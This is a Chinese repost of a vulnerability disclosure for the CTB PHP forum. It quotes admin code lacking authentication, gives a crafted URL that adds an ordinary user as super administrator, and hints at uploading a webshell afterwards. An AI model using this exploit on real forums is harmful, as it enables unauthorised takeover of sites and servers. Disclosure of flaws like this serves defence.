欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  后端开发

漂亮但不安全的CTB_PHP

程序员文章站 2022-04-30 14:00:04
...
>>>Dedicated This Scrap To CaoJing
涉及版本:
^^^^^^^
目前所有版本(现在1.3Alpha为最高版本)

描述:
^^^^^^
CTB是一款由实易数码;开发和维护的源代码开放的PHP论坛。由于其后台管理文件验证存在缺陷,可能导致非法用户直接添加论坛超级管理员,进而威胁论坛或服务器安全。

具体:
^^^^
CTB书写非常规范,代码井然有序,赏心悦目,的确是优美的程序;特别是其功能模块,着实让小弟学习了一把。但安全方面却令人堪忧:

试看如下代码:

/admin/main.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
//获取get变量
if( is_array($_GET) ) {
foreach($_GET as $k=>$v) {
if( is_array( $_GET[$k]) ) {
foreach($_GET[$k] as $k2=>$v2) {
$return[$k][$k2] = $v2;
}
} else {
$return[$k] = $v;
}
}
}
...
$mod = isset($_GET['mod']) ? $_GET['mod'] : $_POST['mod'];
if (!file_exists($mod.".php" {
$mod = "mainright";
}
require_once ($mod.".php";
//-----------------------------------------------------------------------------

//初始化类变量
$ctb = new Module;
$ctb->set = $set;
$ctb->tplPath = "./templates";
$ctb->input = $return;
$ctb->sess = isset($_COOKIE["sess_adminname"]) ? $_COOKIE : $_SESSION;
$ctb->execute();
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

这里没有任何验证,我们看看添加管理员的文件:

/admin/systemuser.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Module extends CommonClass
//系统管理模块子类
{
function execute() {
switch($this->input['action']) {
...
case 'addSystemUser':
$this->addSystemUser();
break;
...
}
}

function addSystemUser()
{
//输入数据简单格式化
$this->inputCheck("main.php?mod=systemuser&action=showSystemUser";
//执行添加操作
$this->file = "../".$this->set[dataPath]."/users/list.php";
$systemLine = $this->select(4, $this->input['systemUserName']);
....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

依然没有验证,一路顺利啊!

利用方法:
^^^^^^^
先注册一个用户:

登陆ID: cat
用户名 : dog
密码: ilikecat
重复密码: ilikecat
信箱: cat@dog.com

接着提交如下URL:

http://www.target.com/ctb/admin/main.php?mod=systemuser&systemUserName=dog&systemUserMode=1&action=addSystemUser

哈哈,你现在已经是超级管理员了,不相信?提交如下URL后台登陆:

http://www.psych.com/ctb/admin/main.php?mod=login

管理名称: cat
管理密码: ilikecat

咦...还真成功了!

你现在是不是想更改后台上传文件类型,然后upload webshell?哼,被我猜到了吧...

后记:另外发现CTB代码注释有些扎眼的错别字,大煞风景,希望可以一起修正。